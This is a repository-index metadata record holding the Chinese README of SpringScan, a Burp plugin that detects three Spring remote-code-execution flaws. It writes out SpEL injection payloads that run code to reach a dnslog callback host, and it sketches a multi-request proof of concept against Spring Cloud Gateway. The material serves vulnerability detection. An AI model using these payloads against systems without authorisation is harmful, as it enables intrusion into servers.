{"id":13843057,"url":"https://github.com/metaStor/SpringScan","last_synced_at":"2025-07-11T17:33:18.859Z","repository":{"id":37418991,"uuid":"479621264","full_name":"metaStor/SpringScan","owner":"metaStor","description":"SpringScan 漏洞检测 Burp插件","archived":false,"fork":false,"pushed_at":"2023-11-14T01:34:38.000Z","size":4103,"stargazers_count":562,"open_issues_count":1,"forks_count":47,"subscribers_count":8,"default_branch":"main","last_synced_at":"2024-08-05T17:35:48.324Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/metaStor.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-04-09T04:51:10.000Z","updated_at":"2024-07-31T15:16:44.000Z","dependencies_parsed_at":"2023-11-11T20:26:20.901Z","dependency_job_id":"dc947abb-0b72-443b-9287-eec2f1573b87","html_url":"https://github.com/metaStor/SpringScan","commit_stats":null,"previous_names":[],"tags_count":10,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/metaStor%2FSpringScan/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/metaStor","download_url":"https://codeload.github.com/metaStor/SpringScan/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225745419,"owners_count":17517639,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:54.146Z","updated_at":"2024-11-21T14:30:40.580Z","avatar_url":"https://github.com/metaStor.png","language":"Java","funding_links":[],"categories":["其他_安全与渗透","Java"],"sub_categories":["网络服务_其他"],"readme":"# SpringScan Burp 检测插件\n\n## 支持检测漏洞\n\n- [x] Spring Core RCE (**CVE-2022-22965**)\n- [x] Spring Cloud Function SpEL RCE (**CVE-2022-22963**)\n- [x] Spring Cloud GateWay SPEL RCE (**CVE-2022-22947**)\n\n## 回连平台\n\n- [x] Dnglog (默认)\n- [x] BurpCollaboratorClient\n- [x] Ceye\n- [ ] Digpm\n- [ ] 支持自定义回连平台\n\n### CVE-2022-22965 检测方法\n\n利用条件\n\n* JDK9及其以上版本；\n* 使⽤了Spring-beans包； \n* 使⽤了Spring参数绑定，参数绑定使⽤的是⾮基本参数类型，如POJO ；\n\n* 使用Tomcat部署，且日志记录功能开启（默认开启）\n\n因为这个洞上传shell还需要准确的web路径（默认在webapps\\ROOT），写ssh和计划任务也需要root权限。实战中用exp去检测漏洞不太现实，所以思路转变到使用其他方法去检测漏洞的存在性。主要通过下面两种方式检测：\n\n* 回显检测\n* 回连检测（Digpm/BurpCollaboratorClient/Dnglos/Ceye）\n\n详细原理 ➡️ [https://www.t00ls.cc/articles-65348.html](https://www.t00ls.cc/articles-65348.html)\n\n检测置信度：\n\n\u003e 回连检测 \u003e 回显检测\n\n回显检测误报率较大，可能存在漏洞但不能保证JDK版本大于等于**9**，可以及时捕捉到不出网的漏洞；回连检测准确率高，不适用于不出网环境。\n推荐在内网的环境只开启回显检测，在公网环境开回显检测和回连检测。\n\n### CVE-2022-22963 检测方法 \n\n利用条件\n\n* 默认路由`/functionRouter`存在SpEL表达式注入\n\n两种检测方法：\n\n* 通过Java自带InetAddres库：`spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName(\"xxx.dnslog.cn\")`回连探测（可绕过WAF拦截命令执行进行漏洞探测）\n* 通过执行`ping`命令：`spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping xxx.dnslog.cn\")`回连探测\n* 会扫描当前URI、以及当前URI拼接默认路由`/functionRouter`进行漏洞探测。\n\n### CVE-2022-22947 检测方法\n\n* 利用条件\n\n该漏洞为当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求，从而远程执行任意代码。\n\n检测方法：\n\n* 两种方法判断是否是SpringGateway:\n* 1.随机访问一个不存在的路径，根据特征`Whitelabel Error Page`判断是否是Spring框架(1.x/2.x); \n* 2.直接访问/actuator/gateway/routes、/prod-api/actuator/gateway/routes，根据特征`route_id`判断；\n* 3.POC分五个请求：`包含恶意SpEL表达式的路由 -\u003e 刷新路由 -\u003e 访问添加的路由查看RCE结果 -\u003e 删除路由 -\u003e 刷新路由`\n\n## 插件情况\n\n|             **回显检测**             |             **回连检测**              |\n|:--------------------------------:|:---------------------------------:|\n| Spring Core RCE (CVE-2022-22965) | Spring Core RCE (CVE-2022-22965)  |\n| Spring Cloud GateWay SPEL RCE (CVE-2022-22947) | Spring Cloud Function SpEL RCE （CVE-2022-22963） |\n\n## TODO\n\n- [x] 解决扫描结果显示一直等待的问题\n- [x] 配置可保存本地\n- [ ] 优化ScannerUI（增加清除按钮、CVE条目、多个漏洞显示）\n- [ ] 新增其他Spring漏洞\n\n## 编译\n\n如需编译其他JDK版本，可参考如下方法编译jar包：\n\n![image-20220409120135726](imgs/image-20220409120135726.png)\n\n\u003cimg src=\"imgs/image-20220409120218010.png\" alt=\"image-20220409120218010\" style=\"zoom:50%;\" /\u003e\n\n\u003cimg src=\"imgs/image-20220409120315324.png\" alt=\"image-20220409120315324\" style=\"zoom:50%;\" /\u003e\n\n\u003cimg src=\"imgs/image-20220409120455863.png\" alt=\"image-20220409120455863\" style=\"zoom:50%;\" /\u003e\n\n## 截图\n\n* 加载插件成功\n\n![image-20220430195312197](imgs/image-20220430195312197.png)\n\n* 漏洞检测情况\n\n![image-20220411234911184](imgs/image-20220411234911184.png)\n\n![image-20220411234930710](imgs/image-20220411234930710.png)\n\n![image-20220411234948718](imgs/image-20220411234948718.png)\n\n* 报错检测情况\n\n![image-20220425233957353](imgs/image-20220425233957353.png)\n\ntarget 模块中可以看到漏洞详情\n\n![image-20220409124402852](imgs/image-20220409124402852.png)\n\n* 插件设置，检测方法默认全开启，回连平台默认`Dnslog`\n\n![image-20220409120720309](imgs/image-20220409120720309.png)\n\n![image-20220413012818703](imgs/image-20220413012818703.png)\n\n* 主动扫描：当不希望每个 URL都做被动扫描时，可以将插件关闭（检测方法正常开启），`右键请求数据包 -\u003e Extensions -\u003e SpringScan -\u003e doScan`即可进行主动扫描：\n\n![image-20220430194559458](imgs/image-20220430194559458.png)\n\n* 插件配置可保存\n\n![image-20231112032954897](imgs/image-20231112032954897.png)\n\n## 免责声明\n\n本工具仅作为安全研究交流，请勿用于非法用途。如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，本人将不承担任何法律及连带责任。\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FmetaStor%2FSpringScan","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FmetaStor%2FSpringScan","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FmetaStor%2FSpringScan/lists"}